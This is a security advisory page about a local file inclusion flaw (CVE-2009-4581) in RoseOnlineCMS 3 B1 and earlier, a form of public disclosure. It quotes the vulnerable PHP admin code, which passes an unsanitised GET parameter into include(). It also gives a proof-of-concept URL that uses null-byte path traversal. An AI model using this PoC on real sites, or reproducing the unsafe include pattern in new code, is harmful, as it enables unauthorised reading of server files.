RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion

2010.01.07
Credit: cr4wl3r
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2009-4581
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

\#'#/ (-.-) --------------------oOO---(_)---OOo------------------- | RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion | | (works only with magic_quotes_gpc = off) | ------------------------------------------------------ [!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org> [!] Download: http://sourceforge.net/projects/rosecms/files/ [!] Date: 30.12.2009 [!] Remote: yes [!] Code : <?PHP if (isset($_GET['write'])) { $argv = explode('-',$_GET['write']); settype($argv,'array'); $_GET['admin'] = @$argv[0]; $_GET['url'] = @$argv[1]; $_GET['do'] = @$argv[2]; $_GET['key'] = @$argv[3]; } $admin = !isset($_GET['admin']) ? index : $_GET['admin'] ; if (is_file("modules/admin/".$admin.".php")) { include("modules/admin/".$admin.".php"); } else { echo('Administrator page not found. <br><br> <a href=index.php>Click here to go back home</a>'); } ob_end_flush(); ?> [!] PoC: [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI%00]

References:

http://xforce.iss.net/xforce/xfdb/55207
http://www.securityfocus.com/bid/37529
http://www.exploit-db.com/exploits/10793
http://packetstormsecurity.org/0912-exploits/roseonlinecms-lfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top